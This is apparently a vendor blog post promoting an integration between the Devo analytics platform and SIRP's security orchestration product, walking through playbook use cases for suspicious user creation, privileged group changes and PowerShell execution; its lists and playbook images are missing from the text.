When we talk about what is most important for an organization to protect? Usually the answer is the critical assets i.e. systems, applications, databases, and services that keep the business running. But are these assets really important? Or is there something else that makes them important? It is business data and informational assets that are of paramount importance. After all, a database is merely a tool holding the data. For example, your financial data would have a different value than your SAP ERP holding that data. Similarly, servers are hardware that is processing or storing certain data. These informational assets are at the heart of every aspect of an organization. Now with the advancements in technology, coupled with cheaper storage options, more and diverse kinds of data is being generated and stored every day than ever before. More data is analyzed in various ways to identify unique patterns.
With cybersecurity, organizations are using data analytics platforms to capture security and privacy data from multiple sources and then identifying patterns to fight with complex and targeted cyber attacks. The power to collect data from a wide variety of sources and the ability to query historical data and apply machine learning algorithms, allows security analysts to hunt threats proactively.
If this proactive approach to collect and correlate alerts and events data is combined with security automation, orchestration and response, the result is:
Devo is a data analytics platform that unlocks the full value of machine data for the world's most instrumented enterprises. On the cybersecurity front, Devo helps organizations in consolidating virtually any type of data required for end-to-end visibility, investigation, and reporting. Some of the useful sources from where Devo collects the data are:
Now Devo customers can use SIRP’s security orchestration and automation capabilities with Devo to get the best of both worlds. This integration allows analysts to use Devo to monitor and detect advanced threats and use SIRP to automate their triage, response, and collaboration.
The cybersecurity landscape is constantly challenged by the ongoing development of advanced attack tactics and techniques. Attackers are making use of machine learning to evade defenses. And things are not slowing down because the continuous innovation in technology is opening up new sources of data that needs to be stored, monitored, and evaluated. Therefore, it’s not practical to say that an organization can prevent all the threats. The security solutions work in silos and an experienced security team is hard to build and even harder to retain.
Cybersecurity data analytics coupled with security orchestration, automation, and response addresses these challenges. Security teams can feed all their security data to Devo and from there, define custom queries and send alerts to SIRP to automate response. Analysts can use SIRP playbooks to automate their artifact triage and response. These playbooks help analysts enrich their investigative data, perform threat hunting activities, gather threat intelligence, and execute endpoint remedial actions.
Consider an example in which SIRP received an alert from Devo about an unauthorized user creation, containing details of the actions and created username. Based on the predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
Let’s take our example (of Use Case 1) one step further. Consider an example in which SIRP received an alert from Devo about an unauthorized user being added to a privileged security group in Microsoft Active Directory. Based on the predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
When an unauthorized Powershell script is executed on an endpoint or a critical server, it is potentially malicious and needs to be detected and remediated immediately. As seen in the Petya/NotPetya campaigns, PowerShell is the most attractive internal tool to be exploited by attackers, facilitating fileless malware delivery within the target environment. Therefore, all PowerShell scripts being executed on critical assets need real time monitoring. Such activities are detected by the Event ID 4688 generated by Microsoft Windows machines.
Consider an example in which SIRP received an alert from Devo about a powershell execution activity. Based on the predefined rules, SIRP automatically executes a playbook. The playbook is set to perform the following actions:
The entire execution and decision flow of the playbook looks something like this:
The actual playbook in SIRP is shown below:
The key benefits that can be realized out of this integration are:
Automated page speed optimizations for fast site performance